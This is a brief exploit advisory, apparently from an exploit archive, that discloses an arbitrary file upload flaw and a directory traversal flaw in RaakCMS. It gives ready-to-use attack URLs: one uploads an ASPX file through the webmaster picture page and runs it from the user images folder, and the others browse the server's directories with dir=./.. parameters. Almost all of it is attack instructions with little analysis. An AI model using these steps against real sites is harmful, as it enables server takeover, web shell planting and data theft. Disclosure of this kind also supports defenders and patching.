id: 10748
date: 02/01/2010
title: RaakCMS Multiple Vulnerabilities
author: Pouya Daneshmand
cves: 

================================
RaakCMS Multiple Vulnerabilities
================================

#################################################################
# Application Info:
# Name: RaakCms
# Vendor: http://raakcms.com
#################################################################
Vulnerability:
=======================
Arbitrary File Upload
=======================
http://server/webmaster/pic.aspx
select file and folder , your file upload here:
http://server/User_Images/[Folder]/FILE.ASPX
 
=======================
Directory Traversal
=======================
http://server/browse.asp?dir=./..
http://server/browseFile.asp?dir=./..
#################################################################



#  0day.today [2023-03-25]  #